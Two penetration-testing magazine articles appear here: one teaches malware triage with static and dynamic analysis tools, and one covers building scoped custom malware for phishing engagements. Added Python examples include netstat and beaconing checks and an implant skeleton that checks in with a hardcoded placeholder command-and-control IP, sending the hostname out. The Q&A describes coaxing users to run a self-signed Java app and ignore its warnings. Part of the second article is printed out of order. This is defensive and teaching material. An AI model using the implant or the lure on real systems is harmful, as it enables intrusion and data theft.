Jon PenTester has scanned a target network with multiple types of antivirus solutions before he begins any penetration attempts from outside of the network. All scans come up clean and he is about to start when he decides to do one more network traffic capture on the network's border server. After a few hours he investigates the traffic and notices unusually high traffic originating from a currently unused system. He double-checks that no one is using the system and determines that there must be some other process running on it. When he goes in to see which processes are using network resources, he discovers an unfamiliar process running from the System32 directory; he is able to kill the process and make a copy of the process executable. He extracts it from the system and now has to determine whether this file is part of a legitimate application or an undetected malicious file.

Notes
One of the most important and useful things a would-be malware analyst can do is to take extensive and detailed notes while performing the analysis. Notes would consist of:

• Filenames
• Hashes
• File Sizes
• Executable Operations
• File Locations
• Network Traffic observed
• Memory Addresses
• Function Imports
• Etc.

I personally like to gather a large amount of information and write a comment to myself about what I think is going on, what I think the executable might be, what it might be trying to do and where I should focus my attention as I continue to prove or disprove my theories. This helps keep track of what you have done and allows you to easily reference any of the previously collected data.

Background Information
When performing forensics of any kind, it's best to collect as much data about an incident and the environment as possible before doing any deeper digging; in cases with possible malware, the same principles apply. However, without a computer forensics team to grab system images or a specialized forensics tool like the Forensic Toolkit (FTK), gathering the easiest-to-obtain information is your best bet. Before you start, you should take note of a number of variables to make your job easier:

• File Location
  • Where was the file located when you found it? Was it in a generic folder like %temp% or in a more specific one?
• Were there any parent or child processes running with the suspicious process?
  • Using a tool like Process Explorer (which we will discuss later) you can easily tell if the suspicious process was spawned by another process or has spawned a process on its own. This information can tell you whether there are more files which need to be collected and analyzed.
• Network Traffic
  • If odd traffic was what led you to the suspicious file, make sure you capture as much of it as possible, regardless of whether it is encrypted or not. Take note of its destination; if you notice a pattern such as beaconing, how often does it do that? These kinds of traits might lead you to identify the file as malware later on, and even which malware family it belongs to.
• What ports (if any) was the process using?
  • You can easily find this out by using a built-in command line tool like 'netstat' or a graphical tool like TCPView. Both of these tools allow the user to monitor port activity.
• What libraries were being accessed?
  • A good clue to the intent of a suspicious executable is which native Windows libraries it is using to complete its operations. Libraries like WS2_32.dll, for example, generally mean there is network activity, while GDI32.dll means that there is probably a GUI being used.
• What other process might the suspicious file have injected into?
  • Malware uses process injection all the time to hide behind legitimate processes like 'svchost.exe'. They do this in order to make their operations seem less suspicious. If you notice odd behavior from a legitimate process, use something like Process Explorer to find out what files might be using its memory space; this is also a good way to find malicious DLL files.
• Operating System Info
  • While this might not be necessary if every system on the network is the same, if you happen to find odd behavior coming from a server or the one system with a different operating system than the rest, it is a good idea to take note of which operating system is being used. Malware often checks which OS it is running on in order to determine its course of action. During dynamic analysis, you may find that a possible malware sample will only run on Windows 7 or Server 2003.
• Current Account
  • Be sure to write down what type of account the suspicious file is running under: is it Administrator or User? Check the file permissions and the owner/creator of the suspicious file. This might also be useful while attempting to recreate the infection during the Dynamic Analysis phase.
• Time/Date
  • The file created/modified/accessed dates and times might not be accurate, since malware usually modifies these values if it is attempting to hide as a legitimate process. However, take these down anyway, because you may be able to determine when the infection originally happened.

Environment Setup
One of the most important things to do before performing analysis on a suspicious file is to build an environment which can accommodate nearly every possible tool you need to perform a full analysis. How secure or protected the environment is depends on how deep you plan to go with your analysis and how much you think you need to protect yourself.

Analysis System
While performing analysis you do not want to accidentally infect your own system with malware, so you will need a separate one to perform your analysis, preferably one that is not connected to the internet or any external-facing network. I recommend using a virtual machine to perform your analysis. You could use any virtual environment program you like as long as it can take snapshots and you can revert to previous saved states.
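For the ports item in the Background Information checklist above, here is an added Python example (not from the article) that parses the output of netstat -ano, joins it with a PID-to-image map of the kind tasklist gives you, and summarises for one PID what a tester would write in the notes: the image path, the ports it listens on and any peers outside the local address ranges. The netstat lines, the process map and the peer address 198.51.100.23 (a documentation-range placeholder standing in for an internet host) are all constructed for the demo; "external" here means outside RFC 1918, loopback and link-local space, which is a simplification a real triage would refine with the customer's address plan.

```python
# Added example (not from the article): parse 'netstat -ano' output and
# summarise one PID's network footprint. All input data below is constructed.
import ipaddress
import re

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       708
  TCP    192.168.80.129:49157   198.51.100.23:443      ESTABLISHED     2316
  TCP    192.168.80.129:49158   192.168.80.1:445       ESTABLISHED     4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2316
  UDP    0.0.0.0:500            *:*                                    1020
"""

# Constructed tasklist-style map of PID -> image path for the same snapshot.
PROCESS_IMAGES = {
    4: "System",
    708: r"C:\Windows\System32\svchost.exe",
    1020: r"C:\Windows\System32\svchost.exe",
    2316: r"C:\Windows\System32\dxdiag2.exe",
}

# TCP rows carry a state column; UDP rows do not, hence the optional group.
LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+"
    r"(?:(LISTENING|ESTABLISHED|CLOSE_WAIT|TIME_WAIT|SYN_SENT|LAST_ACK)\s+)?(\d+)\s*$"
)

# Address space treated as "inside" for the purpose of this triage.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "0.0.0.0/8")]


def split_endpoint(endpoint):
    """'host:port' or '*:*' -> (host, port or None); IPv6 is written [addr]:port."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # banner, column header, blank line
        proto, local, remote, state, pid = m.groups()
        _, local_port = split_endpoint(local)
        remote_host, remote_port = split_endpoint(remote)
        rows.append({"proto": proto, "local_port": local_port, "remote": remote_host,
                     "remote_port": remote_port, "state": state or "", "pid": int(pid)})
    return rows


def is_external(host):
    """True for a routable address outside loopback, link-local and RFC 1918 space."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # '*' or a hostname: cannot tell from netstat alone
    return not (ip.is_loopback or ip.is_link_local or any(ip in n for n in INTERNAL_NETS))


def triage_process(rows, pid, images=PROCESS_IMAGES):
    """Summarise one PID: its image, listening ports and external peers."""
    mine = [r for r in rows if r["pid"] == pid]
    return {
        "image": images.get(pid, "unknown"),
        "listening": sorted({r["local_port"] for r in mine if r["state"] == "LISTENING"}),
        "external_peers": sorted({f'{r["remote"]}:{r["remote_port"]}' for r in mine
                                  if r["state"] == "ESTABLISHED" and is_external(r["remote"])}),
    }


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    for pid in sorted({r["pid"] for r in rows}):
        print(pid, triage_process(rows, pid))
```

A process from System32 that both listens on an unusual port and holds an established session to an outside address, as PID 2316 does here, is exactly the combination worth recording before the file is pulled for static analysis.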

Virtual machines have the most benefits for malware analysis and therefore are the most regularly used and recommended. However, some situations may require the use of a physical system, and in such cases it's a good idea to keep one on stand-by in case you ever need it.

Operating System
While using multiple operating systems is recommended when performing analysis, the best thing to do for forensics purposes is to use the same operating system and/or image used by the network which is currently being tested; this ensures that all possible functionality can be duplicated in the analysis environment as it would be on a user machine.

Tools
There are a lot of different tools available for purchase and for free that can assist in the analysis of a suspicious binary, everything from scanners, monitors and debugging tools to system snapshot tools which can compare changes between two states. Here is a list of some of the most widely used and useful tools:

• Wireshark
• Sysinternals/Winternals Suite
• RegShot
• PE Explorer
• PEiD
• Malcode Analyst Pack

As mentioned before, there are lots of tools, and it usually comes down to what you are comfortable with and personal preference. We will go into more detail about the purpose and use of the above tools as we continue.

Static Analysis
The term Static Analysis usually refers to obtaining data about the file in question by examining the file in an unexecuted state. The types of data you should investigate and take notes on are:

• File Properties
• Interesting Strings
• Section Headers in use/location/sizes
• Packer used
• Compile Date
• Dependencies
• Interesting Icon Used
• Anything else unique or suspicious about the file

Static Analysis Tools
Each phase of file analysis requires its own set of tools, used to gather the data obtained by performing that step. There are three particular tools for performing static analysis that I will discuss: Malcode Analyst Pack, PEiD and PE Explorer.

Malcode Analyst Pack (MAP)
The Malcode Analyst Pack, or MAP, is a set of different tools which help a malware analyst do his job. It includes a series of useful programs which do things like rerouting DNS requests and converting shellcode to an executable. It also includes some nifty "extensions" which can be installed into the operating system and help out with static analysis. We are going to use only one of these extensions to gather some of the above-mentioned data. The company iDefense, which originally created the tool, no longer supports downloads; however, you can still find the installer elsewhere online or just do a search for it.

Strings
The Strings tool provides exactly what the name says: file strings. Strings are obtained by parsing through the file and extracting any runs of text characters which are grouped together to a certain minimum length. Using the strings, you can obtain things like (Figure 1):

• Packer being used (in the example we see UPX)
• File Properties Data
• Import functions and libraries
• Interesting character strings

A number of elements qualify a string as interesting; for example, if you find a string like "Created by Hax0rz" or the path to the project file used by the compiler, these strings should be written down and can be used to help identify the intent and identity of the file. Other interesting strings include, but are not limited to:

Page21 http://pentestmag.com08/2012 (16) August

• URLs
• IP addresses
• Usernames or Passwords
• Comment or Output strings
• File Paths
• Registry Keys
• Digital Signature Data (might be fake)

In addition to strings, the tool also provides an MD5 hash of whatever file you run it against and grabs the size of the file on disk. This information falls into the "File Properties" bucket of data we need to gather. Other tools can give other types of hash values, such as SHA1 or SHA256, which identify the file more reliably; record at least one of them alongside the MD5, since MD5 collisions are practical to construct and two different files can share an MD5.

PEiD
In a perfect world, all files would be easy to analyze as soon as you get hold of them; unfortunately this is not the case, as we see with the use of 'packers'. A packer is a tool which essentially runs the entirety of a file through an algorithm to 'obfuscate' it, or make it difficult to analyze. What PEiD does is analyze a packed file and search for characteristics of a certain type of packer being employed. It uses a comprehensive internal database of different packers and presents the findings to the user. In Figure 2, we see PEiD determined that the file 'EvilFile.exe' was packed with UPX, a fairly common packer.

Knowing what packer is being used gives us two key pieces of information:

• We won't be able to gather any detailed information from the file statically unless we unpack it first.
• The use of a packer can be associated with the intention of the file, i.e. malware is more likely to use non-standard packers.

The discovery of a packer being used does not mean that the file is malware; in fact many legitimate programs use packer algorithms, like UPX, to help protect against reverse engineering. It is important to write down exactly what packer PEiD detects, if any, and then to try and find an unpacker program. There are multiple unpacker programs out there; some are very specific to the packer type while others are more generic. Two that I use fairly often are:

• GUnpacker
• QUnpack

You can download both of these tools for free from the QUnpack website (in Russian).

Figure 1. Strings Extension Tool

Figure 2. PEiD Interface

Figure 3. Unpacked Strings


You can also download PEiD from various places online, such as the Softpedia download site.

Unpacked Strings
Figure 1 was a screenshot of the file strings for the packed file; sometimes you can find interesting strings in a packed file, but most times you cannot, and therefore you need to unpack it first. Figure 3 shows the file strings of the same file once unpacked. It didn't take long to find a whole set of strings which appear to be bot commands.

If PEiD detects no packer but the strings still seem garbled, make sure that the file isn't packed by something PEiD might not recognize, or that the really juicy strings aren't obfuscated on their own. To do this, click the ">>" button on the PEiD interface to gather extra information on other possible detection factors (such as the entropy of the sections), which can tell you whether the file is possibly packed in a different way.

PE Explorer
PE Explorer is an incredibly powerful tool which can essentially tear open a file and show you its innards. Using this tool we can obtain some more of our static analysis phase information, for example:

• Compile Date
• Resources
• Header/Section information
• Dependencies
• Lots of other useful information

In Figure 4, we see the header info for "EvilFile.exe" and can derive the compile date, or when it was originally built. The compile date is important because not only can it give you a timeframe of how long the file has been infecting computers, but if the file was compiled a few years ago it is also less likely to be malware. Keep in mind, however, that this value can be changed by whoever built the file and therefore is not completely trustworthy. Be sure to write down the compile time in your notes.

Figure 4. PE Explorer Interface

In many cases, malware hides as a legitimate file, and while there are numerous ways to detect whether or not a file is legitimately what it claims to be, a good way is to compare the 'section headers' of the suspicious file with those of a legitimate copy of the file obtained online or from a clean system. As seen in Figure 5, the file 'dxdiag.exe' on top is the legitimate version of this file, while the bottom file is malware in disguise. It is evident that not only does the malware not have the same headers as the legitimate file, but even the sizes are completely different. This all means that the two files are not the same or even related, and therefore the bottom file becomes even more suspicious.

While it might be possible to obtain library dependencies and import functions from something like the file strings, a much more organized method is to use the 'import viewer' in PE Explorer. In Figure 6, you can see that 'EvilFile.exe' uses the library URLMON.DLL and the import function 'URLDownloadToFileA' which, if you aren't familiar with it, allows a program to download a file using a URL as input and save it locally on the system in whatever location and with whatever name the program designates. This function alone flags the file as possibly malware if the ability to download files does not fit with what the file describes itself as.

At this point you should have a comprehensive look at your suspicious file from a static standpoint. Make sure to write down in your notes any interesting imports, or even import functions you aren't familiar with, that you can look up later. Double check your notes and ask yourself if there are any other interesting things about the functionality or properties of the file that might make it more unique; if you need to, go back and look up that information again. To get your own copy of PE Explorer, you can get it from HeavenTools, the developer of the tool. You can download the free version or buy a license for it. Keep in mind that the tools mentioned here are only a few of the many available to you, so if you are looking to obtain any kind of specific information that these tools do not provide, search online for a tool that does.

Search for it!
If you are reading this article, it probably means that you aren't a malware analyst by trade; that said, you may be able to take some shortcuts in determining what the file is that you are dealing with. One of these shortcuts is to plug some of the unique data you obtained from the static analysis phase into a search engine and see what pops up.

Figure 5. Comparing Section Headers with PEiD


In Figure 7 you can see that I decided to search for some of the bot command strings which I found in the unpacked version of 'EvilFile.exe'. What I found was the same string listed in some strings posted online by an online malware analysis scanner. I investigated the link and checked a few other strings to make sure they matched my file; once I confirmed they matched, I grabbed the MD5 of the file and used another online scanner, VirusTotal.com. I searched on VirusTotal with the MD5 and, as it turns out, it had already been analyzed; Figure 8 shows the results of this analysis.

Figure 6. PE Explorer: Import Viewer

Figure 7. Searching for Strings

I was also able to check the imports and section header locations of the submitted file to make sure they were similar to my file. This is just one way of using information from only static analysis to determine if a file is malware or not; in this case it was, and I had discovered a variant of this malware without ever having to execute it. It is important to note, however, that this is not usually the norm: if you have discovered a file which is not detected by antivirus or anti-malware engines and screams malicious, then you most likely won't find any useful information online. However, not all is lost, as the next section describes.

Online Auto Analysis Tools
I understand that when performing penetration testing on a network, you will have certain rules to follow, and one of those rules might be that you cannot release any of your findings to anyone outside of your customer; if that is the case for you, then you might have to perform the Dynamic Analysis phase on your own. However, if it is not, then here is another shortcut for you!

Figure 8. VirusTotal Results

Figure 9. Process Explorer Interface

There are multiple online malware analysis engines to which you can submit suspicious files in order to get an idea of whether or not the file is malicious and/or what it can do. This might save you a lot of the time you would have spent performing dynamic analysis. Different scanners have different ways of presenting information to the user: some of them are more technical and will list out the results of executing the file, others will only inform you whether or not the file performs malicious actions. Here is a short list of useful online scanners; keep in mind there are a lot more than this, and it's up to you which one you prefer to use:

• VirusTotal
• Anubis
• ThreatExpert

Another thing to keep in mind is that many security researchers and antivirus vendors will use the output of these tools for research or for writing signatures to detect the files, so if you do not want anyone else knowing about your file before you get a chance to do something with it, do not submit it to these scanners. Searching for a hash you already have, as in the previous section, reveals only the hash; uploading the file reveals the file itself.

Dynamic Analysis
The next phase of analysis is Dynamic Analysis, which means actually running the file (if it is an executable) and monitoring any actions by the file or changes it makes to the operating system. When performing Dynamic Analysis you should be able to obtain the following types of data:

• File creation/deletion/modifications
• Registry creation/deletion/modifications
• Any network operations performed
• Any other processes created by the executable
• Any process injections performed by the file
• All other operations performed by executing the file

Figure 10. Process Monitor Interface

Figure 11. RegShot Interface

Figure 12. RegShot output

Dynamic Analysis Tools
Just like with Static Analysis, there are specific tools which are used to perform the dynamic analysis phase; here is a list of the few we are going to use:

• Sysinternals/Winternals Suite
  • Process Explorer
  • Process Monitor
• RegShot
• Wireshark

Process Explorer
Process Explorer is a very useful tool which acts like the Windows tool "Task Manager". It allows you to monitor what processes are running and gather more information about them; you would use this tool while performing Dynamic Analysis to quickly observe whether any subsequent processes are being created by the executable, or whether the file executed at all. Figure 9 shows the execution of 'dxdiag2.exe', a file which I executed in my testing environment; notice how it created multiple instances of cmd.exe to perform its operations.

Process Monitor
Process Monitor, or ProcMon, monitors everything all processes do on the system, so it is safe to say it is a resource hog. However, it does allow fine-tuned filters to be created, zeroing in on exactly what you are looking for, whether by operation or by process. This tool can be used to see the detailed operations performed by a process, everything from file and registry modifications to process and thread creation. Figure 10 shows our sample 'dxdiag2.exe' adding a new registry value to make itself execute every time the operating system starts.

You can download the entire Sysinternals suite, which comes with numerous different tools directly from the Microsoft website.

RegShot
Take the kind of operations you would see listed and detailed in Process Monitor and simplify them into an easy-to-read text file, and that is what RegShot provides. RegShot takes a snapshot of the current registry and file system before execution and one after, then compares the two and provides the user with the results. This tool is very useful when attempting to determine what files are created/deleted and what changes to the registry were made. Figure 12 shows the output from running RegShot with 'dxdiag2.exe', including the creation of multiple files and deletion of the original executable.

Figure 13. Wireshark Interface

You can download RegShot from the developers SourceForge page.

Wireshark
Wireshark is not a new tool, nor should you, probably being a penetration tester, be unfamiliar with it. However, it is just as important in performing analysis on a suspicious file as it is in penetration testing. You can obtain useful information like the traffic sent by the suspicious file, what ports it is using and what URLs or IPs it is connecting to. Figure 13 shows the network traffic from 'dxdiag2.exe'; notice in the packet data at the bottom of the screenshot that the suspicious file is sending the list of applications I currently have open to whomever it is connecting to, which can be a clear sign of malicious intent. If you don't have it already, you can download Wireshark from the developer's website.

Licensed Tool: GFI Sandbox
While we have primarily spoken about tools which you can obtain for free (at least for a trial) in performing your analysis, if you would rather purchase one tool that could do all of it for you, I would recommend GFI Sandbox. GFI Sandbox will run a file in a completely virtual environment, log all the information about the file and its operations, then present it all to the user in a neat format, making it easy to find unique and interesting data without ever having to perform any of the analysis yourself. GFI Sandbox is not free, however, and while you can submit files to their online scanner for no charge, to run the tool in a private setting costs a license fee.

Dynamic Analysis Conclusions
In explaining the tools and methods behind dynamic analysis, I used a few different executable files to show how the tools work. The key to being able to determine whether or not a file is malicious based upon dynamic analysis results lies in knowing what operations are indicative of malware. For example, regular beaconing and creating start-up registry entries are usually associated with malware; however, the same operations could be performed by a legitimate program. It is important that you always use all of your data to come to a conclusion, and anything you are unsure about you should always ask questions or do web searches about until it all makes sense.
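The two indicators singled out above, start-up registry entries and regular beaconing, can both be checked mechanically from the data the tools in this section produce. The following Python is an added example, not RegShot's or Wireshark's code: snapshot_diff() does what RegShot does over two dictionaries of registry values and file paths and additionally calls out anything written under an autostart location, and beacon_check() takes the connection times to one destination, as read off a Wireshark capture, and reports whether the gaps are regular enough to call beaconing. The before/after snapshots, the dxdiag2.exe entries and the timestamp lists are constructed for the demo, and the list of autostart locations and the 20% jitter threshold are assumptions of this example.

```python
# Added example (not RegShot's or Wireshark's code): a snapshot diff with
# autostart entries called out, and a beaconing check over connection
# timestamps. All input data below is constructed for the demo.
from statistics import median

# Registry locations whose new values mean "runs at start-up" (assumed list).
AUTOSTART_PREFIXES = tuple(p.upper() for p in (
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\System\CurrentControlSet\Services",
))


def snapshot_diff(before, after):
    """before/after map registry values and file paths to their content.
    Returns what was added, deleted and modified, plus the subset of new or
    changed entries that sit under an autostart location."""
    added = {k: after[k] for k in after.keys() - before.keys()}
    deleted = {k: before[k] for k in before.keys() - after.keys()}
    modified = {k: (before[k], after[k]) for k in before.keys() & after.keys()
                if before[k] != after[k]}
    changed = dict(added, **{k: new for k, (_, new) in modified.items()})
    persistence = {k: v for k, v in changed.items() if k.upper().startswith(AUTOSTART_PREFIXES)}
    return {"added": added, "deleted": deleted, "modified": modified, "persistence": persistence}


def beacon_check(timestamps, max_jitter=0.2, min_events=4):
    """timestamps: connection times (seconds) to one destination. Regular gaps
    with little jitter look like beaconing; too few events gives no verdict."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    interval = median(gaps)
    if interval <= 0:
        return {"interval": 0.0, "jitter": float("inf"), "beacon": False}
    jitter = max(abs(g - interval) for g in gaps) / interval   # worst deviation, relative
    return {"interval": interval, "jitter": round(jitter, 3), "beacon": jitter <= max_jitter}


# Constructed snapshots modelled on the RegShot output described above:
# the sample copies itself into System32, registers under Run, drops a temp
# file and deletes the original download.
BEFORE = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe": r"C:\Windows\System32\ctfmon.exe",
    r"C:\Users\jon\Downloads\dxdiag2.exe": "size=184320",
    r"C:\Windows\System32\dxdiag.exe": "size=176640",
}
AFTER = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe": r"C:\Windows\System32\ctfmon.exe",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dxdiag": r"C:\Windows\System32\dxdiag2.exe",
    r"C:\Windows\System32\dxdiag.exe": "size=176640",
    r"C:\Windows\System32\dxdiag2.exe": "size=184320",
    r"C:\Windows\Temp\~df3a1.tmp": "size=2048",
}
# Constructed connection times: one host every ~60 s versus a user browsing.
BEACON_TIMES = [0.0, 60.2, 119.9, 180.1, 240.0, 299.8]
BROWSING_TIMES = [0.0, 3.1, 40.5, 41.0, 120.0]

if __name__ == "__main__":
    diff = snapshot_diff(BEFORE, AFTER)
    for kind in ("added", "deleted", "modified", "persistence"):
        print(kind, sorted(diff[kind]))
    print("beacon?", beacon_check(BEACON_TIMES))
    print("browsing?", beacon_check(BROWSING_TIMES))
```

Neither check is a verdict on its own, as the section says: a legitimate installer writes Run keys and an update client polls on a timer. What they give you is a reproducible line in the notes to weigh against the static findings.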

Code Analysis
The best methods of determining whether or not a file is malware are found within the static and dynamic analysis phases; however, if all else fails and the file still appears malicious after testing and researching and you have not come to a conclusion, then code analysis may be required. Code analysis is something that I cannot describe in a single article, and it is recommended that if you feel the need to perform that phase you should either begin researching code analysis tutorials or find a professional malware reverse engineer to take a look at the file for you.

Conclusion
It is never easy to determine whether or not a file is malicious when it is not being detected by antivirus or anti-malware scanners; however, it is unlikely to be a problem most penetration testers find themselves faced with very often. Even still, while we see stories about super malware on the news, the basic technology and methods used by malware have been the same for some time, and all it takes is a little bit of research and checking out the details to determine whether or not a file is malicious. Malware analysis itself is a discipline which takes years to develop thoroughly, and that is why I advise you not to attempt to find new and interesting malware on your own, but only to identify a file which might be malware and, if you suspect that it is, to go online and submit it to the security community. You can always submit suspicious files to the researchers at Malwarebytes.org and we will be happy to check on it for you and add it to our roster of detected malware.

ADAM KUJAWA
Adam Kujawa is a computer scientist with over seven years' experience in reverse engineering, malware analysis and penetration testing. He has worked at a number of United States federal and defense agencies, helping these organizations research malware threats as well as develop defense and mitigation techniques. Adam has also previously taught malware analysis and reverse engineering to military and civilian personnel.


Using Malware During a Penetration Test
Malware is often associated with negativity; this is not surprising, as malware is short for "malicious software". Malware is frequently used by cyber criminals to send spam, obtain account information, show unwanted advertisements, steal credit card numbers and obtain remote access to internal networks. In this article, we focus on using malware as a part of a penetration test.

Using malicious software as a part of a penetration test requires the utmost preparation and caution. Cyber criminals are not accountable for the behavior of their malware and the harm it causes. As a result, the malware used by attackers may reduce the availability of services, expose the network to other attacks or infect systems that are not part of the attack. When performing a professional penetration test, the tester must take measures to mitigate these risks.

Requirements
The goal of a penetration test that involves phishing is installing, in a controlled manner, malware on client machines. To show the success of the exploitation, it is sufficient for the malware to remotely control the device. At the same time, the tester must make sure he/she prevents others from abusing the same malware to attack the client.

Before starting the penetration test, the tester must ensure that the client understands what the (business) risk of each action is, and that the client agrees to it. In addition, malware must be tailored to the needs and the environment of the client. Tailoring malware also increases the chance of infecting the machines without triggering virus scanners, firewalls, etc. As a part of our assignments which involve deployment of malware through social means (phishing mail and USB drives), we defined a number of requirements the malware must satisfy:

• The testers should be sure that the malware does not have hidden functions. Third-party developed malware might contain functions that are not documented. Installing such malware on a client machine might expose the organization to new attack vectors. Therefore, it is best when the malware is developed internally. Internal development allows hardcoding of the malware's capabilities.

• The connection between the malware and the command and control (C&C) server must be protected. The C&C server informs the malware of the actions it needs to execute, and receives the output from the malware. If the communication between the devices is not secured, another attacker can read the results of the actions, or even gain control over the malware.

• The C&C server must be hardened. If the C&C server gets compromised, it might open the client network to external attacks. Therefore, the server must be hardened. As one of the hardening measures, the C&C server must not be reachable by any software except the malware.

• No device except the C&C server can communicate with the malware. Malware has privi-

of the properties we encode in our malware and C&C server, to assure the clients that the assignment is carried out with minimal impact to the client's business processes.

• The malware connects to a hardcoded IP.• There is SSL connection from malware to the

C&C server.• The malware self-destruct on predetermined

hardcoded date.• No infection after a predetermined hardcoded date.• No infection on machines which are not on a

whitelisted domain. • If the malware is located at a website, the web-

site is reachable only from the target IP range (IP tables filter).

• The C&C server is reachable only through a vPN.• The C&C server is protected with strong passwords.• The list of targets is discussed and agreed with

clients and is hardcoded in the malware.

ConclusionDeveloping malware is quite a straightforward task for an experienced software developer with a se-curity mindset. However, developing malware that can be used for penetration testing requires con-sidering a number of requirements that assure third parties that malware will behave as intended, and within the scope of the assignment. In this arti-cle we touched to a number of these requirements and listed how we use these requirements as part of our social engineering assignments in the Secu-rity & Privacy Group in Deloitte.

leged access to the client device. If an attack-er manages to communicate to the malware, it might override the commands of the C&C serv-er and use malware for malicious actions.

• Malware should operate only in the time frame of the assignment. The client needs to have its devices clean after the penetration test, as they were before the start of the test. There-fore, the client must be assured that all client machines will be sanitized and that malware will stop functioning after the test is finished. Mal-ware should be benign before the assignment starts. After the assignment malware should al-so stop working and self-delete.

• Malware must infect only predetermined de-vices. After infecting one device, malware could start propagating to other devices that are out of the scope of the assignment or moreover to de-vices out of the control of the client. Therefore, the testers should have a predetermined list of devices malware is allowed to propagate to.

Practical caseAs part of the social engineering assignments, we use custom build malware to simulate an attack from a malicious attacker. We translated the above requirements to a number of practical steps that provide assurance the assignment will be executed without additional risks to the client. Here are some
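One way to implement the hardcoded guardrails from the practical-case list above, as an added example that is not Deloitte's code (their implant is a Java Web Start application talking to a PHP C&C): the engagement window, the whitelisted domain and the agreed target list are hardcoded and checked before anything else runs, the drop site's IP-range filter is mirrored at the application level, and the C&C connection goes to a fixed IP over TLS. Pinning the C&C certificate is an assumption added here; the article only specifies an SSL connection, and without pinning any server that terminates TLS in the path could impersonate the C&C. All addresses, dates, domains, hostnames and the certificate fingerprint are constructed placeholders.

```python
"""Scope guardrails for a pen-test implant.

Added example for the practical-case list above; not Deloitte's code.
Every value below is a constructed placeholder: the real IP, certificate
fingerprint, dates, domain and host list would be agreed with the client
and hardcoded before the build. Certificate pinning is an assumption
added here; the article only specifies an SSL connection.
"""
import hashlib
import ipaddress
import os
import socket
import ssl
import sys
from datetime import date

# --- hardcoded engagement parameters (placeholders) -----------------------
C2_HOST = "203.0.113.10"                  # hardcoded C&C IP (TEST-NET-3)
C2_PORT = 443
C2_CERT_SHA256 = hashlib.sha256(b"constructed-c2-certificate").hexdigest()
ENGAGEMENT_START = date(2012, 8, 1)       # benign before this date
ENGAGEMENT_END = date(2012, 8, 31)        # no infection, self-destruct after this
ALLOWED_DOMAINS = {"corp.example.com"}    # whitelisted domain(s)
TARGET_HOSTS = {"WS-FIN-001", "WS-FIN-002"}  # agreed target list
DROP_SITE_CLIENTS = ipaddress.ip_network("198.51.100.0/24")  # target IP range


def in_scope(hostname: str, domain: str) -> bool:
    """Infect only whitelisted domains and only the agreed hosts."""
    return domain.lower() in ALLOWED_DOMAINS and hostname.upper() in TARGET_HOSTS


def decide(today: date, hostname: str, domain: str) -> str:
    """Gate every run: 'dormant', 'run', 'out-of-scope' or 'self-destruct'."""
    if today > ENGAGEMENT_END:
        return "self-destruct"      # assignment over: stop and remove yourself
    if today < ENGAGEMENT_START:
        return "dormant"            # benign before the assignment starts
    if not in_scope(hostname, domain):
        return "out-of-scope"       # never run on a machine not on the list
    return "run"


def source_allowed(client_ip: str) -> bool:
    """Application-level twin of the iptables filter on the malware's web site."""
    return ipaddress.ip_address(client_ip) in DROP_SITE_CLIENTS


def c2_certificate_trusted(der_cert: bytes) -> bool:
    """Pin the C&C certificate so no other server can impersonate it."""
    return hashlib.sha256(der_cert).hexdigest() == C2_CERT_SHA256


def connect_c2(timeout: float = 10.0) -> ssl.SSLSocket:
    """TLS to the hardcoded IP; abort unless the peer shows the pinned cert."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # pinning replaces CA/hostname validation
    ctx.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection((C2_HOST, C2_PORT), timeout=timeout)
    tls = ctx.wrap_socket(raw)
    if not c2_certificate_trusted(tls.getpeercert(binary_form=True)):
        tls.close()
        raise ConnectionError("C&C certificate mismatch: refusing to talk")
    return tls


def self_destruct(path: str = "") -> bool:
    """Delete the implant binary; returns True once it is gone."""
    target = path or os.path.abspath(sys.argv[0])
    try:
        os.remove(target)
    except FileNotFoundError:
        pass
    return not os.path.exists(target)


if __name__ == "__main__":
    host = socket.gethostname()
    dom = os.environ.get("USERDNSDOMAIN", "")  # set on domain-joined Windows hosts
    action = decide(date.today(), host, dom)
    if action == "self-destruct":
        self_destruct()
    elif action == "run":
        with connect_c2() as c2:
            c2.sendall(b"checkin " + host.encode())
```

decide() runs before any payload code, so a machine that is not on the list never executes the real functionality, and an implant left behind after the end date removes itself on its next start. self_destruct() returns whether the file is actually gone, which is what the cleanup report to the client should record; reading USERDNSDOMAIN for the domain check is an assumption for domain-joined Windows hosts.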

TRAJCE DIMKOV
Trajce Dimkov has obtained a PhD in Information Security with a focus on physical penetration and social engineering methodologies. With over 6 years of experience, Trajce is a part of the Security & Privacy Team of Deloitte NL, where he is involved in a number of penetration testing assignments.

HENRI HAMBARTSUMYAN
Henri Hambartsumyan is a consultant in the Security & Privacy Team of Deloitte NL. He has over 4 years of experience in IT. He is involved in performing source code reviews, ethical hacking and physical penetration testing assignments for various financial services clients. Henri is part of the world champion team of the Cyberlympics 2011.

Additional questions to the authors

In what language do you prefer to write the exploit?
We actually do not write any exploit, to ensure that the malware injection works on all the different environments. Instead, we use a self-signed Java Web Start application. Before loading the JWS application, we explain to the user on the website that they might experience some "technical difficulties"; they are encouraged to click OK and ignore the error messages.

What kind of server do you use for the C&C?
A Linux machine with Apache & PHP, with an interface to control all the machines. The C&C is custom built.

What tool do you use for developing the email to make it appear as phishing?
